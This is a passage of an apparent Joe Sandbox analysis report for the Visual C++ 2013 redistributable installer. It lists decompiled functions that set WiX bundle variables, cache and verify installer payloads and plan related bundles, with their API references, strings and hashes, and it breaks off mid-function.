Opcode Fuzzy Hash: 10f488f8156ce3336689c0a5deaaacbb5cb5dfcf6d2b8c93ee06be2294728c1b
Instruction Fuzzy Hash: 0F41CA75DA022FABCF31AB6A9C8CAFE77B8AF50710F1006D5E519B3140D6704E918F91

Uniqueness

Uniqueness Score: -1.00%

Function 01289DA3 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01289DA3(void* __ebx, void* __ecx, signed int* __edi, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _t49;
				signed int _t50;
				void* _t60;
				void* _t62;
				signed int _t63;
				unsigned int _t66;
				signed int _t74;
				unsigned int _t78;
				signed int _t80;
				unsigned int _t87;
				signed int* _t88;
				void* _t90;
				struct _CRITICAL_SECTION* _t91;
				void* _t93;

				_t88 = __edi;
				_t77 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				EnterCriticalSection(_a4);
				_t90 = E01288E63(_t77, _a4, _a8,  &_v8);
				if(_t90 >= 0) {
					_t74 = _v8;
					_t49 = _t74;
					if(_t90 != 1) {
						_t91 = _a4;
						_t50 = _t49 * 0x30;
						_t78 =  *(_t91 + 0x20);
						if( *((intOrPtr*)(_t50 + _t78 + 0x20)) == 0 || _a12 == 1 || _a12 == 2 &&  *((intOrPtr*)(_t50 + _t78 + 0x1c)) != 0) {
							L11:
							if(_a16 != 0 && _a12 == 0) {
								_t85 =  *(_t91 + 0x20);
								if( *((intOrPtr*)(_t74 * 0x30 +  *(_t91 + 0x20) + 0x18)) == 0) {
									_t28 =  &(_t88[2]); // 0x8068006a
									_t60 =  *_t28 - 1;
									if(_t60 == 0) {
										_t38 =  &(_t88[1]); // 0x488
										_push( *_t38);
										_push( *_t88);
										E012AF6A2(2, "Setting numeric variable \'%ls\' to value %lld", _a8);
										_t93 = _t93 + 0x14;
									} else {
										_t62 = _t60 - 1;
										if(_t62 == 0) {
											_t63 =  *_t88;
											if(_t63 != 0) {
												_push(_t63);
												_push(_a8);
												_push("Setting string variable \'%ls\' to value \'%ls\'");
											} else {
												_push(0);
												_push(_a8);
												_push("Unsetting variable \'%ls\'");
											}
											_push(2);
											E012AF6A2();
											_t93 = _t93 + 0x10;
										} else {
											if(_t62 == 1) {
												_t80 =  *_t88;
												_t29 =  &(_t88[1]); // 0x488
												_t66 =  *_t29;
												_push(_t80 & 0x0000ffff);
												_t87 = _t66;
												_push((_t87 << 0x00000020 | _t80) >> 0x10 & 0x0000ffff);
												_push(_t66 & 0x0000ffff);
												_v8 = _t66;
												_push(_t66 >> 0x10);
												_t85 = _t87 >> 0x10;
												E012AF6A2(2, "Setting version variable \'%ls\' to value \'%hu.%hu.%hu.%hu\'", _a8);
												_t93 = _t93 + 0x1c;
											}
										}
									}
								} else {
									E012AF6A2(2, "Setting hidden variable \'%ls\'", _a8);
									_t93 = _t93 + 0xc;
								}
							}
							_t42 =  *(_t91 + 0x20) + 8; // 0x8
							_t90 = E012A1091(_t85, _t88, _t74 * 0x30 + _t42);
							if(_t90 >= 0) {
								goto L27;
							} else {
								_push(_a8);
								_push("Failed to set value of variable: %ls");
								goto L26;
							}
						} else {
							_t90 = 0x80070057;
							E012B294E(_t50, "variable.cpp", 0x525, 0x80070057);
							_push(_a8);
							_push("Attempt to set built-in variable value: %ls");
							L26:
							_push(_t90);
							E012AFA86();
							_t93 = _t93 + 0xc;
							L27:
							goto L28;
						}
					}
					_t90 = E01289C0E(_t49, _a4, _a8);
					if(_t90 >= 0) {
						_t91 = _a4;
						goto L11;
					} else {
						_push(_a8);
						_push("Failed to insert variable \'%ls\'.");
						goto L26;
					}
				} else {
					E012AFA86(_t90, "Failed to find variable value \'%ls\'.", _a8);
					_t93 = _t93 + 0xc;
					L28:
					LeaveCriticalSection(_a4);
					if(_t90 < 0 && _a16 != 0) {
						_push(_t90);
						E012AF6A2(2, "Setting variable failed: ID \'%ls\', HRESULT 0x%x", _a8);
					}
					return _t90;
				}
			}

0x01289da3
0x01289da3
0x01289da6
0x01289da7
0x01289da8
0x01289db0
0x01289dc5
0x01289dc9
0x01289de2
0x01289de5
0x01289dea
0x01289e0a
0x01289e0d
0x01289e10
0x01289e18
0x01289e52
0x01289e57
0x01289e66
0x01289e72
0x01289e88
0x01289e8b
0x01289e8c
0x01289eef
0x01289eef
0x01289ef2
0x01289efe
0x01289f03
0x01289e8e
0x01289e8e
0x01289e8f
0x01289ec9
0x01289ecd
0x01289eda
0x01289edb
0x01289ede
0x01289ecf
0x01289ecf
0x01289ed0
0x01289ed3
0x01289ed3
0x01289ee3
0x01289ee5
0x01289eea
0x01289e91
0x01289e92
0x01289e94
0x01289e96
0x01289e96
0x01289e9c
0x01289e9d
0x01289ea6
0x01289eaa
0x01289eab
0x01289eb1
0x01289eb5
0x01289ebf
0x01289ec4
0x01289ec4
0x01289e92
0x01289e8f
0x01289e74
0x01289e7e
0x01289e83
0x01289e83
0x01289e72
0x01289f0c
0x01289f17
0x01289f1b
0x00000000
0x01289f1d
0x01289f1d
0x01289f20
0x00000000
0x01289f20
0x01289e2d
0x01289e2d
0x01289e3d
0x01289e42
0x01289e45
0x01289f25
0x01289f25
0x01289f26
0x01289f2b
0x01289f2e
0x00000000
0x01289f2e
0x01289e18
0x01289df7
0x01289dfb
0x01289e4f
0x00000000
0x01289dfd
0x01289dfd
0x01289e00
0x00000000
0x01289e00
0x01289dcb
0x01289dd4
0x01289dd9
0x01289f2f
0x01289f32
0x01289f3a
0x01289f42
0x01289f4d
0x01289f52
0x01289f59
0x01289f59

APIs

EnterCriticalSection.KERNEL32(00000001,01281D56,00000000,00000000,?,0128A72F,01282222,01281E8E,00000000,00000001), ref: 01289DB0

Part of subcall function 01288E63: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,?,000000FF,?,00000000,00000030,0128982F,?,0128ADF0,?,00000030,00000000,00000030), ref: 01288E9C

LeaveCriticalSection.KERNEL32(00000001,00000008,WixBundleElevated,00000001,00000000,00000000,?,0128A72F,01282222,01281E8E,00000000,00000001), ref: 01289F32

Strings

Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 01289EB8
variable.cpp, xrefs: 01289E38
Failed to insert variable '%ls'., xrefs: 01289E00
Setting string variable '%ls' to value '%ls', xrefs: 01289EDE
Failed to find variable value '%ls'., xrefs: 01289DCE
Unsetting variable '%ls', xrefs: 01289ED3
Setting numeric variable '%ls' to value %lld, xrefs: 01289EF7
Setting hidden variable '%ls', xrefs: 01289E77
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 01289F46
WixBundleElevated, xrefs: 01289DE1
Attempt to set built-in variable value: %ls, xrefs: 01289E45
Failed to set value of variable: %ls, xrefs: 01289F20

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalSection$CompareEnterLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$WixBundleElevated$variable.cpp
API String ID: 2612025200-3866887438
Opcode ID: 105e676055be1ad5aa65419bfad22ce2600faf74b25e10a8e8c745c3cc5e0b8c
Instruction ID: e78a6cd92691613766147f9e77f7233d5d5f99d8e944d0887628c5d2e429f412
Opcode Fuzzy Hash: 105e676055be1ad5aa65419bfad22ce2600faf74b25e10a8e8c745c3cc5e0b8c
Instruction Fuzzy Hash: BB514731671216BBDF25AF14CD85EBA7B68EB64718F00801AFD085A2D1E370DA90CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01298FE4 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 120
fileCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E01298FE4(void* __eax, WCHAR* __ebx, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* __edi;
				void* __esi;
				void* _t14;
				char* _t16;
				struct _SECURITY_ATTRIBUTES* _t25;
				signed int _t26;
				WCHAR* _t30;
				void* _t34;
				void* _t36;
				intOrPtr _t37;
				signed int _t41;

				_t34 = __edx;
				_t30 = __ebx;
				_push(__ecx);
				_t40 = 0;
				_t36 = __eax;
				_t14 = CreateFileW(__ebx, 0x80000000, 5, 0, 3, 0x8000000, 0);
				_v8 = _t14;
				if(_t14 != 0xffffffff) {
					if( *((intOrPtr*)(_t36 + 0x20)) == 0) {
						if( *((intOrPtr*)(_t36 + 0x1c)) == 0) {
							goto L12;
						} else {
							_t25 = E01297E2A(__ebx, _t34, _t36, _t14);
							goto L10;
						}
					} else {
						_t25 = E01298A1A(_t34, _t36, __ebx, _t14);
						L10:
						_t40 = _t25;
						if(_t25 >= 0) {
							L12:
							_t15 =  *((intOrPtr*)(_t36 + 0x30));
							if( *((intOrPtr*)(_t36 + 0x30)) == 0) {
								L16:
								_t16 = L"Moving";
								if(_a8 == 0) {
									_t16 = L"Copying";
								}
								_t37 = _a4;
								_push(_t37);
								_push(_t30);
								E012AF6A2(2, "%ls payload from working path \'%ls\' to path \'%ls\'", _t16);
								_push(0x7d0);
								_push(3);
								_push(1);
								if(_a8 == 0) {
									_push(_t37);
									_push(_t30);
									_t41 = E012B5A1F();
									if(_t41 < 0) {
										_push(_t37);
										_push(_t30);
										_push("Failed to copy %ls to %ls");
										goto L23;
									}
								} else {
									_push(1);
									_push(_t37);
									_push(_t30);
									_t41 = E012B5B65();
									if(_t41 < 0) {
										_push(_t37);
										_push(_t30);
										_push("Failed to move %ls to %ls");
										L23:
										_push(_t41);
										E012AFA86();
									}
								}
							} else {
								_t41 = E01297D07(_t30, _v8, _t34, _t36, _t40, _t15,  *((intOrPtr*)(_t36 + 0x34)), _t30);
								if(_t41 >= 0) {
									goto L16;
								} else {
									_push(_a4);
									_push("Failed to verify payload hash: %ls");
									goto L15;
								}
							}
						} else {
							_push(_a4);
							_push("Failed to verify payload signature: %ls");
							L15:
							_push(_t41);
							E012AFA86();
						}
					}
					CloseHandle(_v8);
				} else {
					_t26 = GetLastError();
					if(_t26 > 0) {
						_t26 = _t26 & 0x0000ffff | 0x80070000;
					}
					_t41 = _t26;
					if(_t41 >= 0) {
						_t41 = 0x80004005;
					}
					E012B294E(_t26, "cache.cpp", 0x4d9, _t41);
					E012AFA86(_t41, "Failed to open payload in working path: %ls", _t30);
				}
				return _t41;
			}

0x01298fe4
0x01298fe4
0x01298fe7
0x01298fea
0x01298ffd
0x01298fff
0x01299005
0x0129900b
0x01299053
0x01299062
0x00000000
0x01299064
0x01299068
0x00000000
0x01299068
0x01299055
0x01299058
0x0129906d
0x0129906d
0x01299071
0x0129907d
0x0129907d
0x01299082
0x012990aa
0x012990ae
0x012990b3
0x012990b5
0x012990b5
0x012990ba
0x012990bd
0x012990be
0x012990c7
0x012990d3
0x012990d8
0x012990da
0x012990dc
0x012990f6
0x012990f7
0x012990fd
0x01299101
0x01299103
0x01299104
0x01299105
0x00000000
0x01299105
0x012990de
0x012990de
0x012990e0
0x012990e1
0x012990e7
0x012990eb
0x012990ed
0x012990ee
0x012990ef
0x0129910a
0x0129910a
0x0129910b
0x01299110
0x012990eb
0x01299084
0x01299091
0x01299095
0x00000000
0x01299097
0x01299097
0x0129909a
0x00000000
0x0129909a
0x01299095
0x01299073
0x01299073
0x01299076
0x0129909f
0x0129909f
0x012990a0
0x012990a5
0x01299071
0x01299116
0x0129900d
0x0129900d
0x01299015
0x0129901c
0x0129901c
0x01299021
0x01299025
0x01299027
0x01299027
0x01299037
0x01299043
0x01299048
0x01299121

APIs

CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,?,0129955E,00000000,?,00000000,?), ref: 01298FFF
GetLastError.KERNEL32(?,?,0129955E,00000000,?,00000000,?,?,00000000,00000000,?,?,?,0128F207,?,?), ref: 0129900D

Part of subcall function 01297E2A: _memset.LIBCMT ref: 01297E54

Part of subcall function 012B5A1F: Sleep.KERNEL32(00000000,?,?,01297736,00000000,?,00000001,00000003,000007D0,?,?,01299676,00000000,00000000,00000000,00000000), ref: 012B5A36

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000003,000007D0,?,?), ref: 01299116

Strings

Copying, xrefs: 012990B5, 012990BF
Failed to verify payload hash: %ls, xrefs: 0129909A
%ls payload from working path '%ls' to path '%ls', xrefs: 012990C0
Failed to open payload in working path: %ls, xrefs: 0129903D
cache.cpp, xrefs: 01299032
Failed to verify payload signature: %ls, xrefs: 01299076
Moving, xrefs: 012990AE
Failed to copy %ls to %ls, xrefs: 01299105
Failed to move %ls to %ls, xrefs: 012990EF

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep_memset
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 2828417756-1604654059
Opcode ID: 71c5cc3d6f7939da8d9924140648072925c7fac315d5fb1e1cc6261788cf4288
Instruction ID: dedbad204faf70765e7acea416a8abce588374b327aa6e142e67dab8c213391e
Opcode Fuzzy Hash: 71c5cc3d6f7939da8d9924140648072925c7fac315d5fb1e1cc6261788cf4288
Instruction Fuzzy Hash: E431C771A70626BBDF32152D8C4AFBF395CEB51F74F00411CFA15BA280D665DD808AE1

Uniqueness

Uniqueness Score: -1.00%

Function 01294319 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 280
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E01294319(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int* _v24;
				signed int* _v28;
				char _v32;
				signed int _v36;
				void* __edi;
				intOrPtr _t86;
				signed int _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr* _t98;
				intOrPtr _t99;
				int _t104;
				signed int _t114;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t120;
				intOrPtr _t122;
				signed int _t123;
				signed int _t134;
				intOrPtr* _t137;
				signed int _t144;
				void* _t146;
				signed int* _t147;
				intOrPtr _t148;
				intOrPtr* _t150;
				intOrPtr* _t151;
				void* _t152;

				_t136 = __ecx;
				_t148 = _a8;
				_t82 =  *((intOrPtr*)(_t148 + 0xc0));
				_t147 = 0;
				_t134 = 0;
				_v12 = 0;
				_v32 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t148 + 0xc0)) == 0) {
					L5:
					_v28 = _t147;
					__eflags =  *((intOrPtr*)(_t148 + 0xb8)) - _t147;
					if( *((intOrPtr*)(_t148 + 0xb8)) <= _t147) {
						L67:
						if(_v8 != 0) {
							E012B6DCE(_t147, _v8);
						}
						if(_v12 != 0) {
							E012B0490(_v12, _v32);
						}
						return _t134;
					}
					_v24 = _t147;
					while(1) {
						_t150 =  *((intOrPtr*)(_t148 + 0xb4)) + _v24;
						_t146 = 0;
						 *(_t150 + 0x64) =  *(_t150 + 0x64) & 0x00000000;
						_t18 = _t150 + 0x68; // 0x160
						_t147 = _t18;
						 *_t147 = 0;
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						_t20 = _t150 + 0x18; // 0x101
						_t134 = E012B7284(_t136, _v8,  *_t20);
						__eflags = _t134;
						if(_t134 < 0) {
							__eflags = _t134 - 0x80070490;
							if(_t134 != 0x80070490) {
								_push("Failed to lookup the bundle ID in the ancestors dictionary.");
								L64:
								_push(_t134);
								E012AFA86();
								goto L67;
							}
							L12:
							_t146 = 0;
							__eflags = 0;
							L13:
							_t86 = _a8;
							_t137 =  *((intOrPtr*)(_t86 + 0xc0));
							__eflags = _t137 - _t146;
							if(_t137 == _t146) {
								L25:
								_t47 = _t150 + 0xbc; // 0x12813ef
								_t134 = E012B1171(_t137, _t146, _t47,  *((intOrPtr*)(_t86 + 0x10)), _t146);
								__eflags = _t134;
								if(_t134 < 0) {
									_push("Failed to copy self to related bundle ancestors.");
									goto L64;
								}
								L26:
								_t91 =  *_t150 - 1;
								__eflags = _t91;
								if(_t91 == 0) {
									L50:
									_t135 = _a4;
									_t59 = _t150 + 0x18; // 0x101
									 *(_t150 + 0x64) =  *_t147;
									_t61 = _t135 + 0x10; // 0x5f012d4f
									_t93 =  *_t61;
									_t134 = E0128BC36(_a4, 1,  *((intOrPtr*)( *_t93 + 0x4c))(_t93,  *_t59, _t147));
									__eflags = _t134;
									if(_t134 < 0) {
										E012B294E(_t95, "plan.cpp", 0x4f8, _t134);
										_push("UX aborted plan related bundle.");
										goto L64;
									}
									_t63 = _t150 + 0x64; // 0xe9be05eb
									_t97 =  *_t63;
									__eflags =  *_t147 - _t97;
									if( *_t147 != _t97) {
										_push(E01291B44(_t97));
										_push(E01291B44( *_t147));
										_t64 = _t150 + 0x18; // 0x101
										E01281566(2, 0x200000ca,  *_t64);
										_t152 = _t152 + 0x14;
									}
									_t98 = _a16;
									__eflags =  *_t98 - 4;
									if( *_t98 != 4) {
										L58:
										_v28 =  &(_v28[0]);
										_t99 = _a8;
										_t136 = _v28;
										_v24 =  &(_v24[0x3e]);
										__eflags = _v28 -  *((intOrPtr*)(_t99 + 0xb8));
										if(_v28 >=  *((intOrPtr*)(_t99 + 0xb8))) {
											goto L67;
										}
										_t148 = _t99;
										continue;
									} else {
										__eflags =  *_t150 - 5;
										if( *_t150 != 5) {
											goto L58;
										}
										__eflags =  *_t147;
										if( *_t147 == 0) {
											goto L58;
										}
										__eflags =  *(_t150 + 0xa0);
										if(__eflags <= 0) {
											goto L58;
										}
										_t67 = _t150 + 0x9c; // 0xabec7d8d
										_t151 =  *_t67;
										_t69 = _t98 + 0x78; // 0x12813ab
										_t134 = E012B8091(_t69, _t146, __eflags, _t98 + 0x74, _t69,  *_t151,  *((intOrPtr*)(_t151 + 8)));
										__eflags = _t134;
										if(_t134 < 0) {
											_push( *_t151);
											_push("Failed to add the package provider key \"%ls\" to the planned list.");
											_push(_t134);
											L66:
											E012AFA86();
											goto L67;
										}
										goto L58;
									}
								}
								_t114 = _t91 - 1;
								__eflags = _t114;
								if(_t114 == 0) {
									__eflags = _a12 - 2;
									if(_a12 == 2) {
										goto L50;
									}
									_t116 =  *_a16;
									__eflags = _t116 - 4;
									if(_t116 > 4) {
										L44:
										_t117 = _a8;
										_t55 = _t150 + 0xc; // 0x8cb0ff53
										__eflags =  *((intOrPtr*)(_t117 + 0x3c)) -  *_t55;
										if(__eflags < 0) {
											L48:
											__eflags = 0;
											L49:
											 *_t147 = 0;
											goto L50;
										}
										if(__eflags > 0) {
											L47:
											_push(2);
											_pop(0);
											goto L49;
										}
										_t57 = _t150 + 8; // 0xc458b76
										__eflags =  *((intOrPtr*)(_t117 + 0x38)) -  *_t57;
										if( *((intOrPtr*)(_t117 + 0x38)) <=  *_t57) {
											goto L48;
										}
										goto L47;
									}
									__eflags = _t116 - 3;
									if(_t116 != 3) {
										goto L50;
									}
									goto L44;
								}
								_t120 = _t114 - 1;
								__eflags = _t120;
								if(_t120 == 0) {
									L35:
									_t122 =  *_a16;
									_t144 = 4;
									__eflags = _t122 - _t144;
									if(_t122 != _t144) {
										__eflags = _t122 - 5;
										if(_t122 == 5) {
											L40:
											 *_t147 = _t144;
											goto L50;
										}
										__eflags = _t122 - 6;
										if(_t122 == 6) {
											goto L40;
										}
										__eflags = _t122 - 7;
										L33:
										if(__eflags == 0) {
											 *_t147 = 5;
										}
										goto L50;
									}
									 *_t147 = 2;
									goto L50;
								}
								_t123 = _t120 - 1;
								__eflags = _t123;
								if(_t123 == 0) {
									goto L35;
								}
								__eflags = _t123 != 1;
								if(_t123 != 1) {
									_push( *_t150);
									_push("Unexpected relation type encountered during plan: %d");
									_t134 = 0x8000ffff;
									_push(0x8000ffff);
									goto L66;
								}
								__eflags = _a12 - 2;
								if(_a12 == 2) {
									goto L50;
								}
								__eflags =  *_a16 - 4;
								goto L33;
							}
							__eflags =  *_t137 - _t146;
							if( *_t137 == _t146) {
								goto L25;
							}
							_push( *((intOrPtr*)(_t86 + 0x10)));
							_t26 = _t150 + 0xbc; // 0x12813ef
							_t134 = E012B177A(_t26, L"%ls;%ls", _t137);
							_t152 = _t152 + 0x10;
							__eflags = _t134;
							if(_t134 >= 0) {
								goto L26;
							}
							_push("Failed to copy ancestors and self to related bundle ancestors.");
							goto L64;
						}
						_push(E01291A96( *_t150));
						_t22 = _t150 + 0x18; // 0x101
						_push( *_t22);
						_push(0x200000d6);
						L10:
						_push(2);
						E01281566();
						_t152 = _t152 + 0x10;
						goto L58;
						L17:
						__eflags = _a20 - 2;
						if(_a20 != 2) {
							goto L13;
						}
						_v36 = 1;
						_v20 = 0;
						__eflags =  *(_t150 + 0xa0);
						if( *(_t150 + 0xa0) <= 0) {
							L24:
							_push(E01291A96( *_t150));
							_t45 = _t150 + 0x18; // 0x101
							_push( *_t45);
							_push(0x200000d5);
							goto L10;
						}
						_v16 = 0;
						do {
							_t33 = _t150 + 0x9c; // 0xabec7d8d
							_t104 = CompareStringW(0x7f, 1,  *( *_t33 + _v16), 0xffffffff,  *(_a8 + 0x44), 0xffffffff);
							__eflags = _t104 - 2;
							if(_t104 == 2) {
								_t36 =  &_v36;
								 *_t36 = _v36 & 0x00000000;
								__eflags =  *_t36;
							}
							_v20 = _v20 + 1;
							_v16 = _v16 + 0x10;
							_t43 = _t150 + 0xa0; // 0x8dababab
							__eflags = _v20 -  *_t43;
						} while (_v20 <  *_t43);
						__eflags = _v36;
						if(_v36 == 0) {
							goto L12;
						}
						goto L24;
					}
				}
				_t134 = E012B168B(__ecx, __edx,  &_v12,  &_v32, _t82, ";");
				if(_t134 >= 0) {
					_t134 = E012B72D0(__ecx, __edx,  &_v8, _v12, _v32, 1);
					__eflags = _t134;
					if(_t134 >= 0) {
						goto L5;
					}
					_push("Failed to create dictionary from ancestors array.");
					goto L64;
				}
				_push("Failed to create string array from ancestors.");
				goto L64;
			}

0x01294319
0x01294321
0x01294324
0x0129432b
0x0129432d
0x0129432f
0x01294332
0x01294335
0x0129433a
0x01294380
0x01294380
0x01294383
0x01294389
0x01294640
0x01294644
0x01294649
0x01294649
0x01294652
0x0129465a
0x0129465a
0x01294665
0x01294665
0x0129438f
0x01294392
0x01294398
0x0129439b
0x0129439d
0x012943a1
0x012943a1
0x012943a4
0x012943a6
0x012943a9
0x00000000
0x00000000
0x012943af
0x012943ba
0x012943bc
0x012943be
0x012943df
0x012943e5
0x01294603
0x01294626
0x01294626
0x01294627
0x00000000
0x0129462d
0x012943eb
0x012943eb
0x012943eb
0x012943ed
0x012943ed
0x012943f0
0x012943f6
0x012943f8
0x012944a7
0x012944ab
0x012944b7
0x012944b9
0x012944bb
0x0129460a
0x00000000
0x0129460a
0x012944c1
0x012944c3
0x012944c3
0x012944c4
0x0129454a
0x0129454c
0x01294550
0x01294553
0x01294556
0x01294556
0x01294568
0x0129456a
0x0129456c
0x0129461c
0x01294621
0x00000000
0x01294621
0x01294572
0x01294572
0x01294575
0x01294577
0x0129457f
0x01294587
0x01294588
0x01294592
0x01294597
0x01294597
0x0129459a
0x0129459d
0x012945a0
0x012945d3
0x012945d3
0x012945d6
0x012945d9
0x012945dc
0x012945e3
0x012945e9
0x00000000
0x00000000
0x012945eb
0x00000000
0x012945a2
0x012945a2
0x012945a5
0x00000000
0x00000000
0x012945a7
0x012945aa
0x00000000
0x00000000
0x012945ac
0x012945b3
0x00000000
0x00000000
0x012945b5
0x012945b5
0x012945be
0x012945cd
0x012945cf
0x012945d1
0x01294630
0x01294632
0x01294637
0x01294638
0x01294638
0x00000000
0x0129463d
0x00000000
0x012945d1
0x012945a0
0x012944ca
0x012944ca
0x012944cb
0x01294517
0x0129451b
0x00000000
0x00000000
0x01294520
0x01294522
0x01294525
0x0129452c
0x0129452c
0x01294532
0x01294532
0x01294535
0x01294546
0x01294546
0x01294548
0x01294548
0x00000000
0x01294548
0x01294537
0x01294541
0x01294541
0x01294543
0x00000000
0x01294543
0x0129453c
0x0129453c
0x0129453f
0x00000000
0x00000000
0x00000000
0x0129453f
0x01294527
0x0129452a
0x00000000
0x00000000
0x00000000
0x0129452a
0x012944cd
0x012944cd
0x012944ce
0x012944f0
0x012944f3
0x012944f7
0x012944f8
0x012944fa
0x01294504
0x01294507
0x01294513
0x01294513
0x00000000
0x01294513
0x01294509
0x0129450c
0x00000000
0x00000000
0x0129450e
0x012944e6
0x012944e6
0x012944e8
0x012944e8
0x00000000
0x012944e6
0x012944fc
0x00000000
0x012944fc
0x012944d0
0x012944d0
0x012944d1
0x00000000
0x00000000
0x012944d3
0x012944d4
0x012945f2
0x012945f9
0x012945fe
0x01294600
0x00000000
0x01294600
0x012944da
0x012944de
0x00000000
0x00000000
0x012944e3
0x00000000
0x012944e3
0x012943fe
0x01294401
0x00000000
0x00000000
0x01294407
0x0129440a
0x0129441c
0x0129441e
0x01294421
0x01294423
0x00000000
0x00000000
0x01294429
0x00000000
0x01294429
0x012943c7
0x012943c8
0x012943c8
0x012943cb
0x012943d0
0x012943d0
0x012943d2
0x012943d7
0x00000000
0x01294433
0x01294433
0x01294437
0x00000000
0x00000000
0x01294439
0x01294440
0x01294443
0x01294449
0x01294492
0x01294499
0x0129449a
0x0129449a
0x0129449d
0x00000000
0x0129449d
0x0129444b
0x0129444e
0x01294451
0x01294467
0x0129446d
0x01294470
0x01294472
0x01294472
0x01294472
0x01294472
0x01294476
0x0129447c
0x01294480
0x01294480
0x01294480
0x01294488
0x0129448c
0x00000000
0x00000000
0x00000000
0x0129448c
0x01294392
0x0129434f
0x01294353
0x01294370
0x01294372
0x01294374
0x00000000
0x00000000
0x01294376
0x00000000
0x01294376
0x01294355
0x00000000

Strings

Unexpected relation type encountered during plan: %d, xrefs: 012945F9
Failed to lookup the bundle ID in the ancestors dictionary., xrefs: 01294603
%ls;%ls, xrefs: 01294411
Failed to copy self to related bundle ancestors., xrefs: 0129460A
Failed to copy ancestors and self to related bundle ancestors., xrefs: 01294429
Failed to create dictionary from ancestors array., xrefs: 01294376
Failed to create string array from ancestors., xrefs: 01294355
UX aborted plan related bundle., xrefs: 01294621
plan.cpp, xrefs: 01294617
Failed to add the package provider key "%ls" to the planned list., xrefs: 01294632

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID:
String ID: %ls;%ls$Failed to add the package provider key "%ls" to the planned list.$Failed to copy ancestors and self to related bundle ancestors.$Failed to copy self to related bundle ancestors.$Failed to create dictionary from ancestors array.$Failed to create string array from ancestors.$Failed to lookup the bundle ID in the ancestors dictionary.$UX aborted plan related bundle.$Unexpected relation type encountered during plan: %d$plan.cpp
API String ID: 0-489706565
Opcode ID: 09c965ddfd8593d403c5934d0eb4d9388ce2e4f4868bad9723cc03af57cbede5
Instruction ID: a48246e4d209570948dc0f98b13601aa9171387e5552a464e7046b12f77950a5
Opcode Fuzzy Hash: 09c965ddfd8593d403c5934d0eb4d9388ce2e4f4868bad9723cc03af57cbede5
Instruction Fuzzy Hash: 32A10170A20347EFEF21EF9CDA81ABAB7B5FF24304F104529E615A7251D7B0A852CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01298ED9 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97
fileCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E01298ED9(void* __eax, void* __ebx, void* __ecx, void* __edx, WCHAR* __edi, intOrPtr _a4) {
				void* _v8;
				void* __esi;
				char* _t10;
				signed int _t19;
				void* _t25;
				void* _t26;
				WCHAR* _t27;
				void* _t29;
				signed int _t30;

				_t27 = __edi;
